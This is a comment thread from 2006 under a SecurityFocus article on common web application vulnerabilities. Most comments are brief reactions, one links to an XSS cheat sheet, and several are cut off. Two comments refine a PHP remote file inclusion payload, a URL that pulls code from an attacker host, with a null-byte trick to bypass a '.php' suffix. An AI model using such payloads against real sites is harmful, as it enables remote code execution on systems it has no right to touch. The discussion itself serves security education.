Five common Web application vulnerabilities
Sumit Siddharth, Pratiksha Doshi

Five common Web application vulnerabilities 2006-04-28
Anonymous
Good article, got me nostalgic for when I was doing app testing 4 years back, for a while. But the content is stale (no offense); it has been reproduced in many articles. Maybe we ought to take web application security to the next level, where we are thinking more in terms of process and procedures f...

Five common Web application vulnerabilities 2006-05-01
Anonymous
FANTASTIC article. Bravo!...

Five common Web application vulnerabilities 2006-05-05
Anonymous
For XSS you should check out the XSS Cheat Sheet: http://ha.ckers.org/xss.html ...

Five common Web application vulnerabilities 2006-05-09
Anonymous (1 replies)
There is a typo:

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt

that is not the proper exploit to leverage this hole:

require ($page . ".php");

because of the ".php"

you need to end the attacker's url with a hexed null byte %00 like this:

http://www.vulnsite.com/inde...

Re: Five common Web application vulnerabilities 2006-05-15
Anonymous
Why do that?

Just put

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack

and it will become

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.php...

Five common Web application vulnerabilities 2006-05-24
Anthony Lai, OWASP (Hong Kong Chapter)
Among OWASP Top 10 vulnerabilities, the items are covered but it does not mention the criticality and risk level. It is rather a good idea and I could refer to OWASP for that.

From this article, some are readily technology dependent, especially for those vulnerabilities related to PHP-base...








 

Copyright 2009, SecurityFocus